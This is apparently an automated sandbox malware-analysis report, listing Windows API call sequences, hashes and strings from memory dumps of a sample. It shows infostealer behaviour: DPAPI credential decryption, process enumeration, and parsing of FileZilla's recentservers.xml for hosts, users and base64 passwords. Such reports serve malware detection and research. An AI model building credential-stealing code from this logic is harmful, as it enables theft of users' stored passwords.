                                                             • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Heap$AllocByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                                            • String ID:
                                                            • API String ID: 3657800372-0
                                                            • Opcode ID: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                                            • Instruction ID: ec186dc502c88c98e3638293fff085d95328f9e4ca1f8ca95b137b7d6c986ae9
                                                            • Opcode Fuzzy Hash: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                                            • Instruction Fuzzy Hash: 900100B5A80208BBEB10DFD4DD45F9E77B9EB44704F104159FB05BA2C0D674AA018B66
                                                            APIs
                                                            • GetProcessHeap.KERNEL32(00000008,00000400), ref: 022D74B4
                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 022D74BB
                                                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 022D74E8
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 022D750B
                                                            • LocalFree.KERNEL32(?), ref: 022D7515
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                                            • String ID:
                                                            • API String ID: 2609814428-0
                                                            • Opcode ID: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                                            • Instruction ID: 03cadf98fc03014be5a8b63e80c28f79453de4ce1e4a8b84e0aa660d07293381
                                                            • Opcode Fuzzy Hash: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                                            • Instruction Fuzzy Hash: FF010075A90208BBEB10DFD4DD45F9D77B9EB44704F108155FB05AA2C4D6B4AA00CB66
                                                            APIs
                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0041961E
                                                            • Process32First.KERNEL32(00420ACA,00000128), ref: 00419632
                                                            • Process32Next.KERNEL32(00420ACA,00000128), ref: 00419647
                                                            • StrCmpCA.SHLWAPI(?,00000000), ref: 0041965C
                                                            • CloseHandle.KERNEL32(00420ACA), ref: 0041967A
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                             • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                             • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                             • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                             • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                            • String ID:
                                                            • API String ID: 420147892-0
                                                            • Opcode ID: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                                                            • Instruction ID: 11d567adce4b572477f284a2ec541547db87c4b6fd8ba8cb36d7f0fd64301d48
                                                            • Opcode Fuzzy Hash: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                                                            • Instruction Fuzzy Hash: F201E9B9A40208ABCB24DFA5C958BEEB7F9EB49700F104189E90996250D7389F81CF61
                                                            APIs
                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 022E9885
                                                            • Process32First.KERNEL32(00420ACA,00000128), ref: 022E9899
                                                            • Process32Next.KERNEL32(00420ACA,00000128), ref: 022E98AE
                                                            • StrCmpCA.SHLWAPI(?,00000000), ref: 022E98C3
                                                            • CloseHandle.KERNEL32(00420ACA), ref: 022E98E1
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                            • String ID:
                                                            • API String ID: 420147892-0
                                                            • Opcode ID: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                                                            • Instruction ID: bed392d1c59406249c2bfdd7b74981ed85f29ea5f5ccd7a468ab886350c018da
                                                            • Opcode Fuzzy Hash: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                                                            • Instruction Fuzzy Hash: D201E979A60208FBDB20DFE4CD54BEDB7F9EF49700F404189A506A6254D7749A80DF51
                                                            APIs
                                                            • CryptBinaryToStringA.CRYPT32(00000000,00405184,40000001,00000000,00000000,?,00405184), ref: 00418EC0
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                             • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                             • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                             • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                             • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: BinaryCryptString
                                                            • String ID:
                                                            • API String ID: 80407269-0
                                                            • Opcode ID: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                                            • Instruction ID: 3c4cb89ba01459054e3b3595e947631781f59a96386c3a2a773972b879479806
                                                            • Opcode Fuzzy Hash: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                                            • Instruction Fuzzy Hash: 62111C74200204BFDB00CFA4D884FA733AAAF89304F109549F9198B250DB39EC82DB65
                                                            APIs
                                                            • CryptBinaryToStringA.CRYPT32(00000000,022D53EB,40000001,00000000,00000000,?,022D53EB), ref: 022E9127
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: BinaryCryptString
                                                            • String ID:
                                                            • API String ID: 80407269-0
                                                            • Opcode ID: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                                            • Instruction ID: 622d2ef8113f0193da235df1660f906510042ef9c57664332be7fcb04a29c989
                                                            • Opcode Fuzzy Hash: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                                            • Instruction Fuzzy Hash: DF11DD74214205BFDF00CF94DC89FAA33AAAF89754F409559FD0A8F264D775E881EB60
                                                            APIs
                                                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,022D5155,00000000,00000000), ref: 022D9D56
                                                            • LocalAlloc.KERNEL32(00000040,?,?,?,022D5155,00000000,?), ref: 022D9D68
                                                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,022D5155,00000000,00000000), ref: 022D9D91
                                                            • LocalFree.KERNEL32(?,?,?,?,022D5155,00000000,?), ref: 022D9DA6
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: BinaryCryptLocalString$AllocFree
                                                            • String ID:
                                                            • API String ID: 4291131564-0
                                                            • Opcode ID: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                                            • Instruction ID: f1e0d2950fb66c37afa73a8a57ec2a713583f5a14ecf84620eb785c2c8bedc6a
                                                            • Opcode Fuzzy Hash: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                                            • Instruction Fuzzy Hash: 8611A4B4240208BFEB10CFA4CC95FAA77B5EB89704F208058FD159B394C776A941CB90
                                                            APIs
                                                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409B84
                                                            • LocalAlloc.KERNEL32(00000040,00000000), ref: 00409BA3
                                                            • memcpy.MSVCRT(?,?,?), ref: 00409BC6
                                                            • LocalFree.KERNEL32(?), ref: 00409BD3
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Local$AllocCryptDataFreeUnprotectmemcpy
                                                            • String ID:
                                                            • API String ID: 3243516280-0
                                                            • Opcode ID: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                                                            • Instruction ID: 8471c3d920f6d21a6ca128c50317bdd839bed9d1cf50ed0ddd6ab59e3c77a746
                                                            • Opcode Fuzzy Hash: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                                                            • Instruction Fuzzy Hash: 46110CB8A00209EFDB04DF94D985AAE77B6FF89300F104569F915A7390D774AE10CF61
                                                            APIs
                                                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 022D9DEB
                                                            • LocalAlloc.KERNEL32(00000040,00000000), ref: 022D9E0A
                                                            • memcpy.MSVCRT(?,?,?), ref: 022D9E2D
                                                            • LocalFree.KERNEL32(?), ref: 022D9E3A
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Local$AllocCryptDataFreeUnprotectmemcpy
                                                            • String ID:
                                                            • API String ID: 3243516280-0
                                                            • Opcode ID: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                                                            • Instruction ID: d9f662d17a182aba864762757bef7205fdf38135c504fd4ba0f7128c44408f0a
                                                            • Opcode Fuzzy Hash: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                                                            • Instruction Fuzzy Hash: 7D1109B8A00209EFDB04CFA8D985AAEB7B9FF89304F104559F915A7350D730AE50CFA1
                                                            APIs
                                                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,008797C8,00000000,?,00420E10,00000000,?,00000000,00000000), ref: 00417A63
                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,00000000,00000000,?,008797C8,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 00417A6A
                                                            • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,008797C8,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 00417A7D
                                                            • wsprintfA.USER32 ref: 00417AB7
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                                            • String ID:
                                                            • API String ID: 362916592-0
                                                            • Opcode ID: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                                                            • Instruction ID: 8af700d3b0e32b47e9d6ddd9198ddf9a5cfc8e3ba9127fd648bfb7377b14e362
                                                            • Opcode Fuzzy Hash: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                                                            • Instruction Fuzzy Hash: 461152B1A45228EFEB108B54DC45F9AB7B8FB05711F10439AE516932C0D7785A40CF55
                                                            APIs
                                                            • CoCreateInstance.COMBASE(0041E118,00000000,00000001,0041E108,00000000), ref: 00413758
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 004137B0
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ByteCharCreateInstanceMultiWide
                                                            • String ID:
                                                            • API String ID: 123533781-0
                                                            • Opcode ID: 634e478c758f94cb0cd26d84ba9f3abb63f0756ecf75599706a634363863d21a
                                                            • Instruction ID: 95f6a265596bdc049295610fa53daf8ef9ce5e7415083cbf30a8e52d2e28a0c3
                                                            • Opcode Fuzzy Hash: 634e478c758f94cb0cd26d84ba9f3abb63f0756ecf75599706a634363863d21a
                                                            • Instruction Fuzzy Hash: A941F474A40A28AFDB24DF58CC94BDAB7B5BB48306F4041D9A608A72D0E771AEC5CF50
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: free
                                                            • String ID:
                                                            • API String ID: 1294909896-0
                                                            • Opcode ID: 4243eb4f7a4797f88c21eec07c423483bd74b8336bdd1fff1b24957b34ad7449
                                                            • Instruction ID: 73b83034997c00ce190831bab7256bad9184d10151853065d219d92f9c26525e
                                                            • Opcode Fuzzy Hash: 4243eb4f7a4797f88c21eec07c423483bd74b8336bdd1fff1b24957b34ad7449
                                                            • Instruction Fuzzy Hash: 5071C131471B80EBDF6B3BB1DD01F8E7AA3BF04702F904924B1DB295749E226865BE51
                                                            APIs
                                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                              • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                                              • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                              • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                              • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                              • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                              • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                              • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                              • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                              • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                                              • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                                              • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                                              • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                                              • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                                              • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                                              • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                                            • strtok_s.MSVCRT ref: 0041031B
                                                            • GetProcessHeap.KERNEL32(00000000,000F423F,00420DBA,00420DB7,00420DB6,00420DB3), ref: 00410362
                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00410369
                                                            • StrStrA.SHLWAPI(00000000,<Host>), ref: 00410385
                                                            • lstrlenA.KERNEL32(00000000), ref: 00410393
                                                              • Part of subcall function 004188E0: malloc.MSVCRT ref: 004188E8
                                                              • Part of subcall function 004188E0: strncpy.MSVCRT ref: 00418903
                                                            • StrStrA.SHLWAPI(00000000,<Port>), ref: 004103CF
                                                            • lstrlenA.KERNEL32(00000000), ref: 004103DD
                                                            • StrStrA.SHLWAPI(00000000,<User>), ref: 00410419
                                                            • lstrlenA.KERNEL32(00000000), ref: 00410427
                                                            • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00410463
                                                            • lstrlenA.KERNEL32(00000000), ref: 00410475
                                                            • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00410502
                                                            • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 0041051A
                                                            • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 00410532
                                                            • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 0041054A
                                                            • lstrcatA.KERNEL32(?,browser: FileZilla,?,?,00000000), ref: 00410562
                                                            • lstrcatA.KERNEL32(?,profile: null,?,?,00000000), ref: 00410571
                                                            • lstrcatA.KERNEL32(?,url: ,?,?,00000000), ref: 00410580
                                                            • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410593
                                                            • lstrcatA.KERNEL32(?,00421678,?,?,00000000), ref: 004105A2
                                                            • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 004105B5
                                                            • lstrcatA.KERNEL32(?,0042167C,?,?,00000000), ref: 004105C4
                                                            • lstrcatA.KERNEL32(?,login: ,?,?,00000000), ref: 004105D3
                                                            • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 004105E6
                                                            • lstrcatA.KERNEL32(?,00421688,?,?,00000000), ref: 004105F5
                                                            • lstrcatA.KERNEL32(?,password: ,?,?,00000000), ref: 00410604
                                                            • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410617
                                                            • lstrcatA.KERNEL32(?,00421698,?,?,00000000), ref: 00410626
                                                            • lstrcatA.KERNEL32(?,0042169C,?,?,00000000), ref: 00410635
                                                            • strtok_s.MSVCRT ref: 00410679
                                                            • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 0041068E
                                                            • memset.MSVCRT ref: 004106DD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcat$lstrlen$lstrcpy$AllocFileLocal$Heapstrtok_s$CloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
                                                            • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$NA$NA$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                                            • API String ID: 337689325-514892060
                                                            • Opcode ID: a8872f9b9bb1cb9e478c25673be1377050816f1e4d9c1e82bbed77d0740d0bab
                                                            • Instruction ID: d15eb70b6d553ab1cc94bc99ca27928082ec116ada4a7d19c18b432e65637ade
                                                            • Opcode Fuzzy Hash: a8872f9b9bb1cb9e478c25673be1377050816f1e4d9c1e82bbed77d0740d0bab
                                                            • Instruction Fuzzy Hash: 86D16D75A41208ABCB04FBF1DD86EEE7379FF14314F50441EF102A6091DE78AA96CB69
                                                            APIs
                                                            • lstrlen.KERNEL32(00424DA0), ref: 022D4833
                                                            • lstrlen.KERNEL32(00424E50), ref: 022D483E
                                                            • lstrlen.KERNEL32(00424F18), ref: 022D4849
                                                            • lstrlen.KERNEL32(00424FD0), ref: 022D4854
                                                            • lstrlen.KERNEL32(00425078), ref: 022D485F
                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 022D486E
                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 022D4875
                                                            • lstrlen.KERNEL32(00425120), ref: 022D4883
                                                            • lstrlen.KERNEL32(004251C8), ref: 022D488E
                                                            • lstrlen.KERNEL32(00425270), ref: 022D4899
                                                            • lstrlen.KERNEL32(00425318), ref: 022D48A4
                                                            • lstrlen.KERNEL32(004253C0), ref: 022D48AF
                                                            • lstrlen.KERNEL32(00425468), ref: 022D48C3
                                                            • lstrlen.KERNEL32(00425510), ref: 022D48CE
                                                            • lstrlen.KERNEL32(004255B8), ref: 022D48D9
                                                            • lstrlen.KERNEL32(00425660), ref: 022D48E4
                                                            • lstrlen.KERNEL32(00425708), ref: 022D48EF
                                                            • lstrlen.KERNEL32(004257B0), ref: 022D4918
                                                            • lstrlen.KERNEL32(00425858), ref: 022D4923
                                                            • lstrlen.KERNEL32(00425920), ref: 022D492E
                                                            • lstrlen.KERNEL32(004259C8), ref: 022D4939
                                                            • lstrlen.KERNEL32(00425A70), ref: 022D4944
                                                            • strlen.MSVCRT ref: 022D4957
                                                            • lstrlen.KERNEL32(00425B18), ref: 022D497F
                                                            • lstrlen.KERNEL32(00425BC0), ref: 022D498A
                                                            • lstrlen.KERNEL32(00425C68), ref: 022D4995
                                                            • lstrlen.KERNEL32(00425D10), ref: 022D49A0
                                                            • lstrlen.KERNEL32(00425DB8), ref: 022D49AB
                                                            • lstrlen.KERNEL32(00425E60), ref: 022D49BB
                                                            • lstrlen.KERNEL32(00425F08), ref: 022D49C6
                                                            • lstrlen.KERNEL32(00425FB0), ref: 022D49D1
                                                            • lstrlen.KERNEL32(00426058), ref: 022D49DC
                                                            • lstrlen.KERNEL32(00426100), ref: 022D49E7
                                                            • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 022D4A03
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
                                                            • String ID:
                                                            • API String ID: 2127927946-0
                                                            • Opcode ID: 60c508d88f0449400eea4780d1c2a55aa70dbc5de1ae23165444dfbd3f1c6033
                                                            • Instruction ID: c92d7508e6709aee49e0be563c1c34b0bfca0015370bb95c55c0003eaa20f757
                                                            • Opcode Fuzzy Hash: 60c508d88f0449400eea4780d1c2a55aa70dbc5de1ae23165444dfbd3f1c6033
                                                            • Instruction Fuzzy Hash: E241A879740624EBC718AFE5EC89B987F71AB4C712BA0C062F90299190CBF5D511DB3E
                                                            APIs
                                                            • GetProcAddress.KERNEL32(0064A8B0,0064A204), ref: 022E9B08
                                                            • GetProcAddress.KERNEL32(0064A8B0,0064A5C8), ref: 022E9B21
                                                            • GetProcAddress.KERNEL32(0064A8B0,0064A644), ref: 022E9B39
                                                            • GetProcAddress.KERNEL32(0064A8B0,0064A264), ref: 022E9B51
                                                            • GetProcAddress.KERNEL32(0064A8B0,0064A250), ref: 022E9B6A
                                                            • GetProcAddress.KERNEL32(0064A8B0,0064A2F8), ref: 022E9B82
                                                            • GetProcAddress.KERNEL32(0064A8B0,0064A4D4), ref: 022E9B9A
                                                            • GetProcAddress.KERNEL32(0064A8B0,0064A33C), ref: 022E9BB3
                                                            • GetProcAddress.KERNEL32(0064A8B0,0064A5A0), ref: 022E9BCB
                                                            • GetProcAddress.KERNEL32(0064A8B0,0064A548), ref: 022E9BE3
                                                            • GetProcAddress.KERNEL32(0064A8B0,0064A3BC), ref: 022E9BFC
                                                            • GetProcAddress.KERNEL32(0064A8B0,0064A2E8), ref: 022E9C14
                                                            • GetProcAddress.KERNEL32(0064A8B0,0064A60C), ref: 022E9C2C
                                                            • GetProcAddress.KERNEL32(0064A8B0,0064A0B0), ref: 022E9C45
                                                            • GetProcAddress.KERNEL32(0064A8B0,0064A598), ref: 022E9C5D
                                                            • GetProcAddress.KERNEL32(0064A8B0,0064A224), ref: 022E9C75
                                                            • GetProcAddress.KERNEL32(0064A8B0,0064A418), ref: 022E9C8E
                                                            • GetProcAddress.KERNEL32(0064A8B0,0064A634), ref: 022E9CA6
                                                            • GetProcAddress.KERNEL32(0064A8B0,0064A0BC), ref: 022E9CBE
                                                            • GetProcAddress.KERNEL32(0064A8B0,0064A12C), ref: 022E9CD7
                                                            • GetProcAddress.KERNEL32(0064A8B0,0064A2B0), ref: 022E9CEF
                                                            • LoadLibraryA.KERNEL32(0064A550,?,022E6C67), ref: 022E9D01
                                                            • LoadLibraryA.KERNEL32(0064A17C,?,022E6C67), ref: 022E9D12
                                                            • LoadLibraryA.KERNEL32(0064A104,?,022E6C67), ref: 022E9D24
                                                            • LoadLibraryA.KERNEL32(0064A1DC,?,022E6C67), ref: 022E9D36
                                                            • LoadLibraryA.KERNEL32(0064A328,?,022E6C67), ref: 022E9D47
                                                            • GetProcAddress.KERNEL32(0064A6D4,0064A4AC), ref: 022E9D69
                                                            • GetProcAddress.KERNEL32(0064A7F4,0064A424), ref: 022E9D8A
                                                            • GetProcAddress.KERNEL32(0064A7F4,0064A1CC), ref: 022E9DA2
                                                            • GetProcAddress.KERNEL32(0064A8E4,0064A394), ref: 022E9DC4
                                                            • GetProcAddress.KERNEL32(0064A7A8,0064A128), ref: 022E9DE5
                                                            • GetProcAddress.KERNEL32(0064A7D8,0064A414), ref: 022E9E06
                                                            • GetProcAddress.KERNEL32(0064A7D8,00420724), ref: 022E9E1D
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AddressProc$LibraryLoad
                                                            • String ID:
                                                            • API String ID: 2238633743-0
                                                            • Opcode ID: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                                            • Instruction ID: 53cb10b912881480f6cc348d60ee232ac40a3c26526d25caf30921e261c55479
                                                            • Opcode Fuzzy Hash: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                                            • Instruction Fuzzy Hash: 9CA14CBD5D0240BFE364EFE8ED88A963BFBF74E201704661AE605C3264D7399441DB12
                                                            APIs
